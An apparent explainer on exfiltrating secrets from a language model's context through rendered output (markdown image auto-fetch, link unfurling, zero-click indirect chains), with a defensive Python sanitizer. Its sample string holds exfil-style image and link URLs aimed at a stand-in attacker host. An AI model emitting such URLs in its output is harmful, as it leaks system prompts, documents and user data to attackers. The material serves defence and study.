LLM Data Exfiltration

A model holds secrets in its context: the system prompt, retrieved documents, earlier turns, tool outputs. Exfiltration is the problem of getting those out to a server the attacker controls, and the model's own output-rendering surface is the channel. The main variants are markdown image auto-fetch, link unfurling, and the zero-click indirect chain that needs no user action at all.
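As an added, defender-side example (not code from the original page), a Python output filter for the markdown-image channel described above: images whose host is outside a hypothetical allowlist are stripped before rendering, so the client never auto-fetches them, and links to untrusted hosts that carry a long query or path payload are reduced to their visible label. The allowlist host and the `.invalid` host in the constructed sample are assumptions.

```python
import re
from urllib.parse import urlparse

# Hosts the renderer may fetch images from (hypothetical allowlist for this example).
ALLOWED_IMAGE_HOSTS = {"cdn.example-internal.test"}

# Markdown image ![alt](url "title") and inline link [text](url); the link pattern
# refuses a leading '!' so it does not re-match an image.
IMAGE_RE = re.compile(r'!\[([^\]]*)\]\(\s*([^\s)]+)[^)]*\)')
LINK_RE = re.compile(r'(?<!!)\[([^\]]*)\]\(\s*([^\s)]+)[^)]*\)')

def classify_url(url, allowed_hosts):
    """Return a reason string if the URL may not be fetched/followed, else None."""
    p = urlparse(url)
    if p.scheme not in ("http", "https"):
        return "non-http scheme"
    if p.hostname not in allowed_hosts:
        return f"host {p.hostname!r} not allowlisted"
    return None

def carries_payload(url, max_len=64):
    """Heuristic: an unusually long query or path segment is a likely data carrier."""
    p = urlparse(url)
    return len(p.query) > max_len or any(len(s) > max_len for s in p.path.split("/"))

def sanitize_model_output(text, allowed_hosts=ALLOWED_IMAGE_HOSTS):
    """Rewrite model output before it reaches a markdown renderer; return (text, findings)."""
    findings = []

    def drop_image(m):
        alt, url = m.group(1), m.group(2)
        reason = classify_url(url, allowed_hosts)
        if reason is None:
            return m.group(0)
        findings.append(("image", url, reason))
        return f"[image removed: {alt or 'untrusted source'}]"  # no URL left to fetch

    def neuter_link(m):
        label, url = m.group(1), m.group(2)
        reason = classify_url(url, allowed_hosts)
        if reason is None:
            return m.group(0)
        if carries_payload(url):
            findings.append(("link", url, reason + ", long payload"))
            return label  # keep the visible text, drop the clickable target
        findings.append(("link", url, reason))
        return m.group(0)  # untrusted but short: log it, leave it for review

    text = IMAGE_RE.sub(drop_image, text)  # images first, so links never see them
    return LINK_RE.sub(neuter_link, text), findings

# Constructed sample output: one legitimate image, one exfil-style image, one exfil-style link.
SAMPLE = ("Here is your summary.\n"
          "![status](https://cdn.example-internal.test/ok.png)\n"
          "![](https://attacker.invalid/i.png?d=" + "A" * 80 + ")\n"
          "See [docs](https://attacker.invalid/x?q=" + "B" * 100 + ")\n")
```

Running `sanitize_model_output(SAMPLE)` keeps only the allowlisted image and reports two findings, one per untrusted URL.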
